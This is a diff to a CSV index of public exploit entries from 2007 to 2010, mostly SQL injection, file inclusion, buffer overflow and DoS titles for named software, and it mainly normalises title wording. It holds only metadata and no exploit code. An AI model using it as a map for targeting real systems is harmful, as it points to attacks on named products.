+12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,Metasploit,windows,local,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 1.5.3 - (id) SQL Injection",2010-04-15,v3n0m,php,webapps,0 @@ -11190,7 +11190,7 @@ id,file,description,date,author,platform,type,port 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0 -12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Exploit",2010-04-16,"Easy Laster",php,webapps,0 +12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B SQL Injection Exploit",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12258,platforms/windows/dos/12258.py,"Windows - SMB Client-Side Bug Proof of Concept (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - DoS",2010-04-16,ITSecTeam,php,dos,0 @@ -11232,7 +11232,7 @@ id,file,description,date,author,platform,type,port 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 -12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 +12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper (cid) SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 @@ -11240,14 +11240,14 @@ id,file,description,date,author,platform,type,port 12308,platforms/windows/remote/12308.txt,"MultiThreaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits",2010-04-20,Dr_IDE,windows,remote,0 12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal Exploit",2010-04-20,Dr_IDE,windows,remote,0 -12312,platforms/windows/remote/12312.rb,"EasyFTP Server <= 1.7.0.2 CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 +12312,platforms/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (RFI/LFI) Multiple File Include",2010-04-20,"cr4wl3r ",php,webapps,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - (.zip) Memory Corruption",2010-04-20,TecR0c,windows,dos,0 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Upload Shell",2010-04-21,cyberlog,php,webapps,0 12316,platforms/php/webapps/12316.txt,"Joomla Component wmi (com_wmi) LFI",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 12317,platforms/php/webapps/12317.txt,"Joomla Component OrgChart com_orgchart Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 12318,platforms/php/webapps/12318.txt,"Joomla Component Mms Blog com_mmsblog Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 -12319,platforms/php/webapps/12319.txt,"e107 CMS <= 0.7.19 - CSRF",2010-04-21,"High-Tech Bridge SA",php,webapps,0 +12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - CSRF",2010-04-21,"High-Tech Bridge SA",php,webapps,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilite",2010-04-21,ITSecTeam,php,webapps,0 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Stored XSS",2010-04-21,ITSecTeam,php,webapps,0 @@ -11262,8 +11262,8 @@ id,file,description,date,author,platform,type,port 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote DoS",2010-04-22,Andi,linux,dos,0 12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 - Win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 - Win32k.sys SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 -12338,platforms/php/webapps/12338.txt,"Cacti <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12339,platforms/php/webapps/12339.txt,"Cacti <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 +12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 +12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy",2010-04-22,_SuBz3r0_,php,webapps,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote DoS Exploit (IE)",2010-04-22,LiquidWorm,windows,dos,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow PoC",2010-04-22,LiquidWorm,windows,local,0 @@ -11280,9 +11280,9 @@ id,file,description,date,author,platform,type,port 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password & Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete",2010-04-23,"Chip d3 bi0s",php,webapps,0 -12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - (tempid) Remote SQL Injection",2010-04-23,v3n0m,php,webapps,0 +12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - (tempid) SQL Injection",2010-04-23,v3n0m,php,webapps,0 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 -12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Include",2010-04-24,"cr4wl3r ",php,webapps,0 +12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,"cr4wl3r ",php,webapps,0 12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (RFI/LFI) Multiple File Include",2010-04-24,"cr4wl3r ",php,webapps,0 12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - (RFI/LFI) Multiple File Include",2010-04-24,"cr4wl3r ",php,webapps,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging (hpodio08.dll) Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 @@ -11307,11 +11307,11 @@ id,file,description,date,author,platform,type,port 12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,php,webapps,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local,0 12395,platforms/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 -12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Include",2010-04-26,"cr4wl3r ",php,webapps,0 +12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (RFI/LFI) Multiple File Include",2010-04-26,"cr4wl3r ",php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 -12401,platforms/multiple/dos/12401.html,"WebKit <= 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 +12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 @@ -11325,13 +11325,13 @@ id,file,description,date,author,platform,type,port 12414,platforms/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 -12417,platforms/windows/remote/12417.py,"Bigant Messenger <= 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow (0Day)",2010-04-27,mr_me,windows,remote,0 +12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow (0Day)",2010-04-27,mr_me,windows,remote,0 12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF",2010-04-27,indoushka,php,webapps,0 12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Remote Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 12422,platforms/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - (.m3u) PoC",2010-04-27,chap0,windows,dos,0 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software SQL Injection Vunerability",2010-04-27,41.w4r10,php,webapps,0 -12424,platforms/asp/webapps/12424.txt,"Acart <= 2.0 Shopping Cart Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 +12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 12425,platforms/windows/dos/12425.html,"Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS",2010-04-27,Dr_IDE,windows,dos,0 12426,platforms/php/webapps/12426.txt,"Joomla Component Ultimate Portfolio com_ultimateportfolio Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 12427,platforms/php/webapps/12427.txt,"Joomla Component NoticeBoard com_noticeboard Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 @@ -11342,13 +11342,13 @@ id,file,description,date,author,platform,type,port 12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component Upload",2010-04-28,Sid3^effects,php,webapps,0 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 -12435,platforms/php/webapps/12435.txt,"Zabbix <= 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 +12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 12436,platforms/php/webapps/12436.txt,"Pligg CMS (story.php?id) 1.0.4 - SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 12437,platforms/windows/dos/12437.html,"Safari 4.0.3 & 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla Component Wap4Joomla (wapmain.php) SQL Injection",2010-04-28,Manas58,php,webapps,0 -12441,platforms/php/webapps/12441.html,"gpEasy <= 1.6.1 - CSRF Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 +12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - CSRF Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook (casting_view.php) SQL Injection",2010-04-28,v3n0m,php,webapps,0 12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection",2010-04-28,v3n0m,php,webapps,0 @@ -11371,7 +11371,7 @@ id,file,description,date,author,platform,type,port 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi",2010-04-30,Sid3^effects,php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 -12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 +12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection",2010-04-30,Archimonde,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0 12467,platforms/php/webapps/12467.txt,"Webthaiapp detail.php(cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0 @@ -11381,8 +11381,8 @@ id,file,description,date,author,platform,type,port 12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps,0 12473,platforms/php/webapps/12473.txt,"Joomla Component Table JX XSS Vulnerabilities",2010-05-01,Valentin,php,webapps,0 12474,platforms/php/webapps/12474.txt,"Joomla Component Card View JX XSS Vulnerabilities",2010-05-01,Valentin,php,webapps,0 -12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Include",2010-05-01,"cr4wl3r ",php,webapps,0 -12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Include",2010-05-01,"cr4wl3r ",php,webapps,0 +12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0 +12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Auth Bypass",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds Upload",2010-05-02,Sid3^effects,php,webapps,0 @@ -11393,7 +11393,7 @@ id,file,description,date,author,platform,type,port 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload",2010-05-02,indoushka,php,webapps,0 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (RFI/LFI) Multiple File Include",2010-05-02,"cr4wl3r ",php,webapps,0 12487,platforms/windows/dos/12487.html,"JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 -12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Include",2010-05-03,"cr4wl3r ",php,webapps,0 +12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,"cr4wl3r ",php,webapps,0 12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 - XSS Vulnerabilities",2010-05-03,mega-itec.com,php,webapps,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash Exploit (0Day)",2010-05-03,"Inj3ct0r Team",multiple,dos,0 14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL injection",2010-06-24,Sangteamtham,php,webapps,0 @@ -11415,18 +11415,18 @@ id,file,description,date,author,platform,type,port 12510,platforms/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",php,webapps,0 12511,platforms/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,kingcope,windows,remote,0 12512,platforms/windows/remote/12512.py,"Ziepod+ 1.0 - CrossApplication Scripting",2010-05-05,sinn3r,windows,remote,0 -12514,platforms/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink Remote SQL Injection",2010-05-05,CMD,php,webapps,0 +12514,platforms/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,php,webapps,0 12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",php,webapps,0 12516,platforms/windows/local/12516.py,"BaoFeng Storm M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 - LFI",2010-05-06,Batch,php,webapps,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow (DoS) (MS10-005)",2010-05-06,unsign,windows,dos,0 12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0 -12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server <= 1.3.1 - (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 +12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 12521,platforms/php/webapps/12521.txt,"Factux - LFI",2010-05-06,"ALTBTA ",php,webapps,0 12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS SQL Injection",2010-05-06,MasterGipy,php,webapps,0 12523,platforms/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution Exploit",2010-05-06,"JosS and eidelweiss",php,webapps,0 12524,platforms/windows/dos/12524.py,"Windows SMB2 Negotiate Protocol (0x72) Response DoS",2010-05-07,"Jelmer de Hen",windows,dos,0 -12525,platforms/php/webapps/12525.txt,"PHP-Nuke 'friend.php' Module Remote SQL Injection",2010-05-07,CMD,php,webapps,0 +12525,platforms/php/webapps/12525.txt,"PHP-Nuke 'friend.php' Module SQL Injection",2010-05-07,CMD,php,webapps,0 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) SQL Injection",2010-05-07,Ra3cH,asp,webapps,0 12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0 12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 @@ -11441,7 +11441,7 @@ id,file,description,date,author,platform,type,port 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Metasploit)",2010-05-08,blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 -12543,platforms/php/webapps/12543.rb,"Alibaba Clone <= 3.0 (Special) - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 +12543,platforms/php/webapps/12543.rb,"Alibaba Clone 3.0 (Special) - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - (.asx) Local DoS Crash PoC",2010-05-10,"Steve James",windows,dos,0 @@ -11480,12 +11480,12 @@ id,file,description,date,author,platform,type,port 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech - (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 -12585,platforms/php/webapps/12585.txt,"4Images <= 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 +12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - (0Day) Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba - Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection",2010-05-13,c4uR,php,webapps,0 -12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 +12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 12592,platforms/php/webapps/12592.txt,"Joomla Component advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox XSS",2010-05-13,"Valentin Hoebel",php,webapps,0 12594,platforms/php/webapps/12594.txt,"Joomla Component Seber Cart (getPic.php) Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0 @@ -11504,7 +11504,7 @@ id,file,description,date,author,platform,type,port 12607,platforms/php/webapps/12607.txt,"Joomla Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum (buyer/index.php) SQL Injection",2010-05-14,GuN,php,webapps,0 -12610,platforms/multiple/webapps/12610.txt,"VMware View Portal <= 3.1 - XSS",2010-05-14,"Alexey Sintsov",multiple,webapps,0 +12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - XSS",2010-05-14,"Alexey Sintsov",multiple,webapps,0 12611,platforms/php/webapps/12611.txt,"Joomla Component MS Comment 0.8.0b - LFI",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum (about_us.php) SQL Injection",2010-05-15,CoBRa_21,php,webapps,0 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) - Remote File Upload",2010-05-15,ITSecTeam,php,webapps,0 @@ -11512,11 +11512,11 @@ id,file,description,date,author,platform,type,port 12615,platforms/php/webapps/12615.txt,"Joomla Component com_camp SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload 0.9.5 - LFI",2010-05-16,Xr0b0t,php,webapps,0 -12619,platforms/php/webapps/12619.txt,"Cybertek CMS Local File Include",2010-05-16,XroGuE,php,webapps,0 +12619,platforms/php/webapps/12619.txt,"Cybertek CMS Local File Inclusion",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) Stack Buffer Overflow PoC Exploit (0Day)",2010-05-16,sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 -12624,platforms/php/webapps/12624.txt,"LinPHA <= 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 +12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS & SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 @@ -11533,14 +11533,14 @@ id,file,description,date,author,platform,type,port 12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting and Full Path",2010-05-18,"cp77fk4r ",php,webapps,0 12643,platforms/php/webapps/12643.pl,"ChillyCMS Blind SQL Injection",2010-05-18,IHTeam,php,webapps,0 12644,platforms/php/webapps/12644.txt,"WebJaxe SQL Injection",2010-05-18,IHTeam,php,webapps,0 -12645,platforms/php/webapps/12645.txt,"TS Special Edition <= 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 +12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Remote File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 - 8 (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0 12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0 -12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 -12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 +12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 +12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 - Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 